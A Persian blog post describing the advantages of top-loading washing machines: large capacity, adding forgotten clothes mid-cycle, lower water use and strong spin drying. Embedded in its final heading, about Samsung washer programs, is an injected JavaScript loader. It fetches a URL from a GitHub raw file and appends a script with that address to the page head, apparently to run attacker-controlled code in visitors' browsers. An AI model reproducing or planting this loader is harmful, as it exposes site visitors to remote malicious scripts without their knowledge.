دسته‌بندی نشده

فواید استفاده از ماشین لباسشویی های درب بالا

ماشین لباسشویی های درب از جلو امروزه استفاده بیشتری بین کاربران دارند و به دلیل ظاهر زیبا و مدرن تری که دارند بیشتر مورد استفاده افراد قرار می گیرد. با این حال ماشین لباسشویی های درب از بالا هنوز محبوبیت خود را در میان برخی از افراد حفظ کرده اند و درکل نیز کارایی و عملکردی فوق العاده را انجام می دهند. در این مطلب قصد داریم ماشین لباسشویی های درب از بالا و ویژگی و قابلیت های مثبت و کاربردی ان ها را مورد بررسی قرار دهیم. 

ظرفیت بالا

ماشین لباسشویی های درب از بالا عموما با ظرفیت های بسیار بالایی عرضه می شوند. این لباسشویی ها غالبا بسیار کاربردی و فوق العاده بصرفه هستند چراکه می توان در یک چرخه شستشو داخل ان تعداد زیاد اقلام را شستشو داد. با این لباسشویی همچنین امکان شستشو اقلام بزرگ وجود دارد. شستشو اقلام در این لباسشویی به صورتی فوق العاده و کاملا تمیز و پاکیزه انجام خواهد شد. 

کارایی اسان به دلیل طراحی خاص

در بسیار از لباسشویی ها و بخصوص محصولاتی که از قابلیت Add item بی بهره هستند پس از بسته شده درب دیگر امکان اضافه کردن لباس های فراموش شده مانند جوراب و یا اقلام دیگر ممکن نخواهد بود اما در لباسشویی های درب از بالا به اسانی می توان در هر زمانی از چرخه انواع لباس و اقلام فراموش شده را برای شستشو بهتر و سریع تر به ان اضافه کرد. در این لباسشویی ها نیازی به انجام چرخه های اضاقه برای لباس های فراموش شده نمی باشد. زمان شستشو در لباسشویی های درب از بالا بسیار کمتر و سریع تر می باشد. 

مصرف اب پایین

بیش از 90 درصد از انرژی استفاده شده در لباسشویی ها در گرم کردن اب استفاده می شود. استفاده از اب کمتر در چرخه شستشو انرژی و هزینه های گزاف مصرف برق را کاهش می دهد, این ویژگی در تاثیر کاهش مصرف انرژی بسیار مهم و کاربردی می باشد. البته مصرف اب کم در لباسشویی های جدید و مدرن تر دیده می شود اما در لباسشویی های معمولی در هر چرخه نزدیک به 40 تا 45 گالن اب مورد استفاده قرار می گیرد. این میزان در لباسشویی های جدید تقریبا 50 درصد کمتر خواهد بود, با وجود مصرف اب بسیار پایین در این مدل ها شستشو هنوز به بهترین شیوه ممکن انجام خواهد شد. 

خشک کردن فوف العاده لباس ها

در ماشین لباسشویی های درب از بالا لباس ها به صورت فوق العاده و کامل خشک می شوند. در مدل های قدیمی تر از این لباسشویی ها معمولا علاوه بر لباسشویی یک خشک کن نیز همراه ان ارائه می شود که پس از شستشو لباس ها لازم بود از خشک کن برای خشک شدن بهتر لباس ها استفاده کرد اما مدل های جدید به صورت اتوماتیک و با افزایش سرعت چرخه این کار را انجام می دهند و تمامی لباس های داخل لباسشویی را به صورت فوق العاده ای خشک می کنند. 

برنامه ها و قابلیت های موجود روی ماشین لباسشویی های سامسونگ (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *